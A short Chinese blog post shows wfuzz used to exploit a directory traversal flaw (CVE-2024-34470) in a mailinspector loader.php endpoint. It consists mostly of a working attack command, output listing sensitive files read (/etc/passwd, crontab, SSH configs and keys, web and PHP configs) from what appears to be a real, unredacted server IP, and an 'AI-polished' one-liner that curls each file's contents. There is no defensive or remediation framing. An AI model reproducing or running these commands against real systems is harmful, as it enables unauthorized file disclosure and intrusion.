「一個wfuzz應用案例」拿到目錄遍歷漏洞後用wfuzz爆破

sesmof發表於2024-06-15
┌──(root㉿kali)-[~]
└─# wfuzz -u http://XXX.XXX.XXX.XXX/mailinspector/public/loader.php?path=../../../../../../..FUZZ -w ~/weapons/http-payloads/linux_dir.txt --hl 0
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://187.63.160.15/mailinspector/public/loader.php?path=../../../../../../..FUZZ
Total requests: 201

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                         
=====================================================================

000000031:   200        1 L      2 W        28 Ch       "/etc/ld.so.conf"                                                               
000000017:   200        9 L      54 W       687 Ch      "/etc/fstab"                                                                    
000000016:   200        13 L     53 W       404 Ch      "/etc/crontab"                                                                  
000000029:   200        131 L    446 W      3523 Ch     "/etc/init.d/httpd"                                                             
000000030:   200        476 L    1763 W     14066 Ch    "/etc/init.d/mysql"                                                             
000000038:   200        36 L     48 W       1645 Ch     "/etc/passwd"                                                                   
000000053:   200        2 L      4 W        48 Ch       "/etc/resolv.conf"                                                              
000000057:   200        52 L     262 W      1836 Ch     "/etc/ssh/ssh_config"                                                           
000000058:   200        52 L     262 W      1836 Ch     "/etc/ssh/ssh_config"                                                           
000000020:   200        24 L     88 W       560 Ch      "/etc/httpd/conf.d/php.conf"                                                    
000000072:   200        3 L      3 W        67 Ch       "/etc/sysconfig/network"                                                        
000000071:   200        3 L      3 W        67 Ch       "/etc/sysconfig/network"                                                        
000000069:   200        1 L      2 W        382 Ch      "/etc/ssh/ssh_host_rsa_key.pub"                                                 
000000066:   200        1 L      3 W        627 Ch      "/etc/ssh/ssh_host_key.pub"                                                     
000000070:   200        1 L      2 W        382 Ch      "/etc/ssh/ssh_host_rsa_key.pub"                                                 
000000065:   200        1 L      3 W        627 Ch      "/etc/ssh/ssh_host_key.pub"                                                     
000000062:   200        1 L      2 W        590 Ch      "/etc/ssh/ssh_host_dsa_key.pub"                                                 
000000039:   200        182 L    491 W      4608 Ch     "/etc/php.ini"                                                                  
000000061:   200        1 L      2 W        590 Ch      "/etc/ssh/ssh_host_dsa_key.pub"                                                 
000000021:   200        991 L    4834 W     33726 Ch    "/etc/httpd/conf/httpd.conf"                                                    
000000143:   200        8 L      6 W        306 Ch      "/usr/local/Zend/etc/php.ini"                                                   

Total time: 0
Processed Requests: 201
Filtered Requests: 180
Requests/sec.: 0

參考CVE-2024-34470
補充:AI潤色版命令

wfuzz -u http://x.x.x.x/mailinspector/public/loader.php?path=../../../../../../..FUZZ -w ~/weapons/http-payloads/linux_dir.txt --hl 0 | grep '"/' | awk '!/0 L/' | cut -d '"' -f 2 | xargs -I {} sh -c 'echo {},"<--------"; curl -s http://x.x.x.x/mailinspector/public/loader.php?path=../../../../../../..{}'

相關文章